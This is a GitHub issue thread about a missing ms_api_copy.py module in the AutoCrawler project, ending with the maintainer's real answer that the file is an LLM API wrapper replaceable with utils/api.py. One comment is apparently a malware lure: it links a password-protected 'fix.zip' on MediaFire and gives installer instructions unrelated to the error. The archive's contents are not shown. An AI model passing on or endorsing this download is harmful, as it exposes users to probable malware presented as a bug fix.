### ISSUE TITLE
ms_api_copy.py is missing when running python crawler_generation.py

### ISSUE THREAD

**Issue by David-Hoa2023** [EZ-hwh/AutoCrawler#9]
Please help me!

ms_api_copy.py is missing when running python crawler_generation.py --pattern reflexion --dataset swde --model ChatGPT --seed_website 3 --save_name ChatGPT --overwrite False

Below is the error message
 File "D:\AI_project\AutoCrawler\crawler_generation.py", line 38, in <module>
    from utils.ms_api_copy import ms_chatgpt as chatgpt
ModuleNotFoundError: No module named 'utils.ms_api_copy'
(autocrawler) PS D:\AI_project\AutoCrawler> pip install utils.ms_api_copy
ERROR: Could not find a version that satisfies the requirement utils.ms_api_copy (from versions: none)
ERROR: No matching distribution found for utils.ms_api_copy

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EZ-hwh** [comment]
谢谢你，文件我已经收到！

**Comment by EZ-hwh** [comment]
ms_api_copy.py is a python scripts that calling LLM with API, you can replace it with your LLM calling API. You can replace it with utils/api.py
